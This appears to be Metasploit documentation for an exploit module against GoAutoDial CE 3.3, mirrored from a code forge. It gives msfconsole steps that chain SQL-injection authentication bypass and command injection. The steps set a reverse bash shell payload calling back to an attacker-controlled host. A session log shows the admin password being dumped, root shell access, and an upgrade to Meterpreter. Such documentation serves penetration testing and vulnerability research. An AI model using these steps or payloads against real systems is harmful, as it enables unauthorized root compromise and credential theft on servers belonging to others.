adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b9f5ebcf663934fd95eb4f144e883a7ea4ab628f
metasploit-gs/documentation/modules/exploit/linux/goautodial_3_rce_code_injection.md
T

2.3 KiB
Raw Blame History

Description

This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.

Affected software

GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html Refer to: https://www.exploit-db.com/exploits/36807/

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do use exploit/linux/http/goautodial_3_rce_command_injection
  • Do set payload cmd/unix/reverse_bash
  • Do set RHOST <IP>
  • Do set LHOST <IP>
  • Do set LPORT <PORT>
  • Wait for shell
msf exploit(goautodial_3_rce_command_injection) > check
[+] 192.168.0.76:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > exploit -z

[*] Started reverse TCP handler on 192.168.0.11:4444 
[*] 192.168.0.76:443 - Trying SQL injection...
[+] Authentication Bypass (SQLi) was successful
[*] 192.168.0.76:443 - Dumping admin password...
[+] admin|goautodial|Admin|||Y
[*] 192.168.0.76:443 - Sending payload...waiting for connection
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
[*] Session 7 created in the background.
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]

[*] Upgrading session ID: 7
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.11:4433 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.76
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : test
OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : x64
Meterpreter  : x86/linux
Reference in New Issue View Git Blame Copy Permalink